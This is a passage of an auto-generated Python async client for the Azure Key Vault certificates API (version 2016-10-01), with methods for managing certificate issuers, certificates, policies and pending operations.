:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either CertificateIssuerListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.keyvault.v2016_10_01.models.CertificateIssuerListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CertificateIssuerListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_certificate_issuers.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if maxresults is not None:
query_parameters['maxresults'] = self._serialize.query("maxresults", maxresults, 'int', maximum=25, minimum=1)
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('CertificateIssuerListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_certificate_issuers.metadata = {'url': '/certificates/issuers'} # type: ignore
async def set_certificate_issuer(
self,
vault_base_url: str,
issuer_name: str,
parameter: "_models.CertificateIssuerSetParameters",
**kwargs: Any
) -> "_models.IssuerBundle":
"""Sets the specified certificate issuer.
The SetCertificateIssuer operation adds or updates the specified certificate issuer. This
operation requires the certificates/setissuers permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param issuer_name: The name of the issuer.
:type issuer_name: str
:param parameter: Certificate issuer set parameter.
:type parameter: ~azure.keyvault.v2016_10_01.models.CertificateIssuerSetParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: IssuerBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.IssuerBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.IssuerBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.set_certificate_issuer.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'issuer-name': self._serialize.url("issuer_name", issuer_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameter, 'CertificateIssuerSetParameters')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('IssuerBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
set_certificate_issuer.metadata = {'url': '/certificates/issuers/{issuer-name}'} # type: ignore
async def update_certificate_issuer(
self,
vault_base_url: str,
issuer_name: str,
parameter: "_models.CertificateIssuerUpdateParameters",
**kwargs: Any
) -> "_models.IssuerBundle":
"""Updates the specified certificate issuer.
The UpdateCertificateIssuer operation performs an update on the specified certificate issuer
entity. This operation requires the certificates/setissuers permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param issuer_name: The name of the issuer.
:type issuer_name: str
:param parameter: Certificate issuer update parameter.
:type parameter: ~azure.keyvault.v2016_10_01.models.CertificateIssuerUpdateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: IssuerBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.IssuerBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.IssuerBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_certificate_issuer.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'issuer-name': self._serialize.url("issuer_name", issuer_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameter, 'CertificateIssuerUpdateParameters')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('IssuerBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_certificate_issuer.metadata = {'url': '/certificates/issuers/{issuer-name}'} # type: ignore
async def get_certificate_issuer(
self,
vault_base_url: str,
issuer_name: str,
**kwargs: Any
) -> "_models.IssuerBundle":
"""Lists the specified certificate issuer.
The GetCertificateIssuer operation returns the specified certificate issuer resources in the
specified key vault. This operation requires the certificates/manageissuers/getissuers
permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param issuer_name: The name of the issuer.
:type issuer_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: IssuerBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.IssuerBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.IssuerBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.get_certificate_issuer.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'issuer-name': self._serialize.url("issuer_name", issuer_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('IssuerBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_certificate_issuer.metadata = {'url': '/certificates/issuers/{issuer-name}'} # type: ignore
async def delete_certificate_issuer(
self,
vault_base_url: str,
issuer_name: str,
**kwargs: Any
) -> "_models.IssuerBundle":
"""Deletes the specified certificate issuer.
The DeleteCertificateIssuer operation permanently removes the specified certificate issuer from
the vault. This operation requires the certificates/manageissuers/deleteissuers permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param issuer_name: The name of the issuer.
:type issuer_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: IssuerBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.IssuerBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.IssuerBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.delete_certificate_issuer.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'issuer-name': self._serialize.url("issuer_name", issuer_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('IssuerBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
delete_certificate_issuer.metadata = {'url': '/certificates/issuers/{issuer-name}'} # type: ignore
async def create_certificate(
self,
vault_base_url: str,
certificate_name: str,
parameters: "_models.CertificateCreateParameters",
**kwargs: Any
) -> "_models.CertificateOperation":
"""Creates a new certificate.
If this is the first version, the certificate resource is created. This operation requires the
certificates/create permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param certificate_name: The name of the certificate.
:type certificate_name: str
:param parameters: The parameters to create a certificate.
:type parameters: ~azure.keyvault.v2016_10_01.models.CertificateCreateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CertificateOperation, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.CertificateOperation
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CertificateOperation"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_certificate.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str', pattern=r'^[0-9a-zA-Z-]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'CertificateCreateParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('CertificateOperation', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_certificate.metadata = {'url': '/certificates/{certificate-name}/create'} # type: ignore
async def import_certificate(
self,
vault_base_url: str,
certificate_name: str,
parameters: "_models.CertificateImportParameters",
**kwargs: Any
) -> "_models.CertificateBundle":
"""Imports a certificate into a specified key vault.
Imports an existing valid certificate, containing a private key, into Azure Key Vault. The
certificate to be imported can be in either PFX or PEM format. If the certificate is in PEM
format the PEM file must contain the key as well as x509 certificates. This operation requires
the certificates/import permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param certificate_name: The name of the certificate.
:type certificate_name: str
:param parameters: The parameters to import the certificate.
:type parameters: ~azure.keyvault.v2016_10_01.models.CertificateImportParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CertificateBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.CertificateBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CertificateBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.import_certificate.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str', pattern=r'^[0-9a-zA-Z-]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'CertificateImportParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('CertificateBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
import_certificate.metadata = {'url': '/certificates/{certificate-name}/import'} # type: ignore
def get_certificate_versions(
self,
vault_base_url: str,
certificate_name: str,
maxresults: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.CertificateListResult"]:
"""List the versions of a certificate.
The GetCertificateVersions operation returns the versions of a certificate in the specified key
vault. This operation requires the certificates/list permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param certificate_name: The name of the certificate.
:type certificate_name: str
:param maxresults: Maximum number of results to return in a page. If not specified the service
will return up to 25 results.
:type maxresults: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either CertificateListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.keyvault.v2016_10_01.models.CertificateListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CertificateListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_certificate_versions.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if maxresults is not None:
query_parameters['maxresults'] = self._serialize.query("maxresults", maxresults, 'int', maximum=25, minimum=1)
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('CertificateListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_certificate_versions.metadata = {'url': '/certificates/{certificate-name}/versions'} # type: ignore
async def get_certificate_policy(
self,
vault_base_url: str,
certificate_name: str,
**kwargs: Any
) -> "_models.CertificatePolicy":
"""Lists the policy for a certificate.
The GetCertificatePolicy operation returns the specified certificate policy resources in the
specified key vault. This operation requires the certificates/get permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param certificate_name: The name of the certificate in a given key vault.
:type certificate_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CertificatePolicy, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.CertificatePolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CertificatePolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.get_certificate_policy.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('CertificatePolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_certificate_policy.metadata = {'url': '/certificates/{certificate-name}/policy'} # type: ignore
async def update_certificate_policy(
self,
vault_base_url: str,
certificate_name: str,
certificate_policy: "_models.CertificatePolicy",
**kwargs: Any
) -> "_models.CertificatePolicy":
"""Updates the policy for a certificate.
Set specified members in the certificate policy. Leave others as null. This operation requires
the certificates/update permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param certificate_name: The name of the certificate in the given vault.
:type certificate_name: str
:param certificate_policy: The policy for the certificate.
:type certificate_policy: ~azure.keyvault.v2016_10_01.models.CertificatePolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CertificatePolicy, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.CertificatePolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CertificatePolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_certificate_policy.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(certificate_policy, 'CertificatePolicy')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('CertificatePolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_certificate_policy.metadata = {'url': '/certificates/{certificate-name}/policy'} # type: ignore
async def update_certificate(
self,
vault_base_url: str,
certificate_name: str,
certificate_version: str,
parameters: "_models.CertificateUpdateParameters",
**kwargs: Any
) -> "_models.CertificateBundle":
"""Updates the specified attributes associated with the given certificate.
The UpdateCertificate operation applies the specified update on the given certificate; the only
elements updated are the certificate's attributes. This operation requires the
certificates/update permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param certificate_name: The name of the certificate in the given key vault.
:type certificate_name: str
:param certificate_version: The version of the certificate.
:type certificate_version: str
:param parameters: The parameters for certificate update.
:type parameters: ~azure.keyvault.v2016_10_01.models.CertificateUpdateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CertificateBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.CertificateBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CertificateBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_certificate.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str'),
'certificate-version': self._serialize.url("certificate_version", certificate_version, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'CertificateUpdateParameters')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('CertificateBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_certificate.metadata = {'url': '/certificates/{certificate-name}/{certificate-version}'} # type: ignore
async def get_certificate(
self,
vault_base_url: str,
certificate_name: str,
certificate_version: str,
**kwargs: Any
) -> "_models.CertificateBundle":
"""Gets information about a certificate.
Gets information about a specific certificate. This operation requires the certificates/get
permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param certificate_name: The name of the certificate in the given vault.
:type certificate_name: str
:param certificate_version: The version of the certificate.
:type certificate_version: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CertificateBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.CertificateBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CertificateBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.get_certificate.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str'),
'certificate-version': self._serialize.url("certificate_version", certificate_version, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('CertificateBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_certificate.metadata = {'url': '/certificates/{certificate-name}/{certificate-version}'} # type: ignore
async def update_certificate_operation(
self,
vault_base_url: str,
certificate_name: str,
certificate_operation: "_models.CertificateOperationUpdateParameter",
**kwargs: Any
) -> "_models.CertificateOperation":
"""Updates a certificate operation.
Updates a certificate creation operation that is already in progress. This operation requires
the certificates/update permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param certificate_name: The name of the certificate.
:type certificate_name: str
:param certificate_operation: The certificate operation response.
:type certificate_operation: ~azure.keyvault.v2016_10_01.models.CertificateOperationUpdateParameter
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CertificateOperation, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.CertificateOperation
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CertificateOperation"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_certificate_operation.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(certificate_operation, 'CertificateOperationUpdateParameter')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('CertificateOperation', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_certificate_operation.metadata = {'url': '/certificates/{certificate-name}/pending'} # type: ignore
async def get_certificate_operation(
self,
vault_base_url: str,
certificate_name: str,
**kwargs: Any
) -> "_models.CertificateOperation":
"""Gets the creation operation of a certificate.
Gets the creation operation associated with a specified certificate. This operation requires
the certificates/get permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param certificate_name: The name of the certificate.
:type certificate_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CertificateOperation, or the result of cls(response)
